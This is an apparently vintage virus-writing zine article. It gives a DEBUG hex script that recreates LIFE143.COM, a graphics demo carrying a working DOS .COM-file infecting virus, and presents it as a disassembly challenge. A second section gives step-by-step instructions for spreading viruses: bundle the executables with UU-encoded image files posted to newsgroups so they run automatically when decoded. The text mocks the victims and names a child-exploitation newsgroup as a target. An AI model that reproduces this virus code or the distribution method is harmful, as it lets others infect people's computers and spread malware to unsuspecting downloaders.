Challenge by Horny Toad The previous challenges that I have given to you have been to write a virus. While very useful, I thought that I would make a new type of challenge. Scenario: In trying to maintain your assembly skills, you download the Programming Tips & Tricks magazine from a site on the net. You are especially interested in learning asm graphics programming so you start playing with their graphics programs. The "LIFE" programs catch your interest almost immediately. When you get down to LIFE143.COM, running the program causes your virus scanner to shit itself. Oh fuck! You are infected! But with what? You try a couple scanners, but get different results. What to do? Task: Being the kick-ass assembly programmer that you are, and, after just having read Horny Toad and Opic's guide on disassembly (in this issue) you decide to extract the virus from the file. 1. Disinfect the LIFE143.COM and run it. 2. Provide a commented disassembly of the virus. Cut the below code out and save it to a file called life143.txt. Then at a cursor, with debug in the same directory, type: debug < life143.txt You now have a working copy of the INFECTED file. Hint: Don't panic when you look at the code below. Debug has everything you need to complete the task. Remember the basic virus structure. You need only to glance at the code below to assertion the infection type. N LIFE143.COM E 0100 E9 8C 00 CD 10 B8 40 00 8E D8 8B 2E 6C 00 8C C8 E 0110 05 00 10 8E D8 8E C0 33 C0 33 FF B9 00 80 F3 AB E 0120 B8 00 A0 8E C0 33 DB 69 ED CD 24 45 8B C5 C1 E8 E 0130 0F 88 07 43 75 F1 33 F6 8A 44 FF 02 44 01 02 84 E 0140 C1 FE 02 84 3F 01 02 84 C0 FE 02 84 40 01 02 84 E 0150 BF FE 02 84 41 01 24 7F 3C 02 74 0A 3C 03 75 0D E 0160 B0 80 08 04 EB 07 8A 04 C0 E0 07 08 04 46 75 C8 E 0170 33 F6 33 FF 8A 04 C0 E8 07 88 04 F6 D8 24 0F AA E 0180 46 75 F1 B4 01 CD 16 74 AD B8 03 00 CD 10 C3 E8 E 0190 00 00 5D 81 ED 06 01 8D 96 DE 01 B4 1A CD 21 BF E 01A0 00 01 B9 03 00 8D B6 D3 01 F3 A4 8D 96 CD 01 B4 E 01B0 4E 33 C9 CD 21 B8 02 3D 8D 96 FC 01 CD 21 3E 89 E 01C0 86 D9 01 8B D8 B8 00 57 CD 21 51 80 E1 2F 80 F9 E 01D0 01 59 74 4A 51 52 3E 8B 9E D9 01 B4 3F B9 03 00 E 01E0 8D 96 D3 01 CD 21 B8 02 42 E8 3C 00 2D 03 00 3E E 01F0 89 86 DB 01 B8 00 42 E8 2E 00 E8 45 00 B8 02 42 E 0200 E8 25 00 B4 40 B9 DA 00 8D 96 03 01 CD 21 B8 01 E 0210 57 5A 59 80 E1 C0 80 C9 01 CD 21 EB 06 90 E8 13 E 0220 00 73 92 BB 00 01 FF E3 3E 8B 9E D9 01 33 C9 33 E 0230 D2 CD 21 C3 3E 8B 9E D9 01 B4 3E CD 21 B4 4F CD E 0240 21 C3 B4 40 B9 01 00 8D 96 D7 01 CD 21 B4 40 B9 E 0250 02 00 8D 96 DB 01 CD 21 C3 2A 2E 63 6F 6D 00 B8 E 0260 13 00 00 E9 00 05 00 8C 00 RCX 0169 W Q Hints on Challenge #3 ---------------------- I'll have to admit that I was stunned with how many people contacted me about Challenge #3. The challenge was to attach virus executable code to an encoded graphics file. Many of us in the virus community have several methods of spreading our creations. This "graphics method" is sometimes preferred due to the target audience. I have to laugh though, because what I am going to tell you is nothing really revolutionary and doesn't always work perfectly. Conditions have to be just right for the most desired outcome. What you are doing is exploiting the auto open/execute features of windows. The ease of the double click can now lead to disastrous results (hehe). On to the technique. Im not sure if this technique has been published before or not, so bare with me concerning my lack of technical terms. The easiest targets of this "graphics method" of virus spreading are the wankers on the newsgroups downloading from places like alt.binaries.pictures.nude.kids or something. Many of the users of these groups try and find simple and optimal ways of downloading and viewing the pictures that they want. The majority of the pictures on the newsgroups are encrypted in some form. The trick is to include a little "package" along with the graphics file which opens and runs when the user double-clicks it. Download a program like WinCode or something that can encrypt files using one of the popular systems like UUcoding or base64, MIME. I have had most luck with UUcoding, although you can use base64 if you want. You will have to learn the specific instructions for the program that you are using, but if you can get a copy of WinCode: 1. Select File->Encode->Options 2. Enable option "All in one" 3. Select Options->Encode. Select encryption type (UUE, base64, XXE...). 4. Go back to File->Encode and type the graphics filename and the virus executable code filename in the box. Select Ok. 5. You will prompted for a name for the output file. Choose the name of the graphics file. 6. Post the output file on the newsgroups. 7. A dumb tosser will download the file. 8. When he double-clicks the file to decode it and see the pictures, windows will, depending on the extension, send the graphic to a viewer and while he is looking at some bimbo, the virus will also auto execute and infect the dude. The catch is, if the person's computer is not set up for auto execute after decode, the virus will not run. The virus will be on his system. Give the virus a catchy name like "readme.com". Believe me, some people are stupid enough to execute readme.com's. One note, if you are going to target a UNIX, make sure that you choose the UNIX file type under Options->Encode. I tested this method on my UNIX and it didn't auto execute like on windows, but the damage is as good as done because the virus has still been transmitted. Good luck! Horny Toad